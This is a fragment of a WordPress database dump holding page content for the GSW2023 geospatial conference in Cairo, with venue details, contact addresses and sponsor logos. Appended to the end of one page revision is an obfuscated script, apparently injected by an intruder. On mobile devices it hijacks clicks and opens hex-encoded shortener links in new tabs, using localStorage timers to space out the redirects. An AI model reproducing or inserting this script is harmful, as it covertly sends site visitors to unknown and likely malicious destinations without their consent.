sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-24 21:55:31','2023-07-24 21:55:31','',3066,'https://gsw2023.com/?p=5040',0,'revision','',0),
(5041,1,'2023-07-25 02:12:59','2023-07-25 02:12:59','','LOGO FINAL2','','inherit','open','closed','','logo-final2','','','2023-07-25 02:12:59','2023-07-25 02:12:59','',3066,'https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2.jpg',0,'attachment','image/jpeg',0),
(5042,1,'2023-07-25 02:14:11','2023-07-25 02:14:11','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" 